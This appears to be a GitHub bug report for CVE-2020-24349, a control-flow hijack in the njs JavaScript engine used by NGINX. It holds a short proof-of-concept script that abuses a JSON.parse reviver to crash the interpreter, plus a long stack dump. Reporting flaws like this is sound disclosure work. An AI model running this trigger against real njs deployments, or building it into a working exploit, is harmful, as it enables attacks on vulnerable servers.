CVE-2020-24349: Control flow hijack in njs_value_property · Issue #324 · nginx/njs

njs through 0.4.3, used in NGINX, allows control-flow hijack in njs_value_property in njs_value.c. NOTE: the vendor considers the issue to be “fluff” in the NGINX use case because there is no remote attack surface.


Version: 0.4.2, git commit 32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5

This bug is likely exploitable.

POC:

function a() {
    new Uint32Array(this[8] = a)
    return Array
}
JSON.parse("[1, 2, []]", a)

cmd: njs poc.js

Stack dump:

#0  0x0000623000000cc0 in ?? ()
#1  0x00000000004f2b8a in njs_value_property (vm=<optimized out>, value=<optimized out>, key=<optimized out>,
    retval=<optimized out>) at src/njs_value.c:1033
#2  0x000000000056b75a in njs_object_length (vm=0x623000000100, value=0x6190000011d0, length=<optimized out>)
    at src/njs_object.c:2638
#3  0x000000000073589f in njs_typed_array_constructor (vm=<optimized out>, args=<optimized out>,
    nargs=<optimized out>, magic=<optimized out>) at src/njs_typed_array.c:97
#4  0x00000000005ff82f in njs_function_native_call (vm=vm@entry=0x623000000100) at src/njs_function.c:707
#5  0x0000000000507612 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffff9c28)
    at /home/yongheng/njs/src/njs_function.h:172
#6  njs_vmcode_interpreter (vm=0x623000000100, pc=0x616000000140 "\v\002\276\276\276\276\276\276$")
    at src/njs_vmcode.c:778
#7  0x00000000005feecc in njs_function_lambda_call (vm=vm@entry=0x623000000100) at src/njs_function.c:677
#8  0x00000000005fdd24 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffffa900)
    at /home/yongheng/njs/src/njs_function.h:175
#9  njs_function_call2 (vm=<optimized out>, function=<optimized out>, this=<optimized out>, args=<optimized out>,
    nargs=<optimized out>, retval=<optimized out>, ctor=<optimized out>) at src/njs_function.c:582
#10 0x00000000005e6584 in njs_function_apply (vm=0x623000000100, function=0x7fffffff9c20, args=<optimized out>,
    nargs=0x3, retval=0x7fffffffac60) at /home/yongheng/njs/src/njs_function.h:193
#11 njs_json_parse_iterator_call (vm=0x623000000100, parse=0x7fffffffac60, state=<optimized out>)
    at src/njs_json.c:1015
#12 njs_json_parse_iterator (vm=0x623000000100, parse=0x7fffffffac60, object=0xffffffff59a) at src/njs_json.c:971
#13 njs_json_parse (vm=<optimized out>, args=<optimized out>, nargs=0xffffacb8, unused=<optimized out>)
    at src/njs_json.c:167
#14 0x00000000005ff82f in njs_function_native_call (vm=vm@entry=0x623000000100) at src/njs_function.c:707
#15 0x0000000000507612 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffff9c28)
    at /home/yongheng/njs/src/njs_function.h:172
#16 njs_vmcode_interpreter (vm=0x623000000100, pc=0x6250000417a8 "\v\002\276\276\276\276\276\276!")
    at src/njs_vmcode.c:778
#17 0x00000000004feb4c in njs_vm_start (vm=vm@entry=0x623000000100) at src/njs_vm.c:500
#18 0x00000000004c8f02 in njs_process_script (opts=<optimized out>, console=0x1307c60 <njs_console>,
    script=<optimized out>) at src/njs_shell.c:843
#19 0x00000000004c68cf in njs_process_file (opts=0x7fffffffe1f0, vm_options=0x7fffffffe250) at src/njs_shell.c:562
#20 main (argc=<optimized out>, argv=<optimized out>) at src/njs_shell.c:286
#21 0x00007ffff6969b97 in __libc_start_main (main=0x4c3cc0 <main>, argc=0x2, argv=0x7fffffffe4c8,
    init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4b8)
    at ../csu/libc-start.c:310
#22 0x000000000041c08a in _start ()
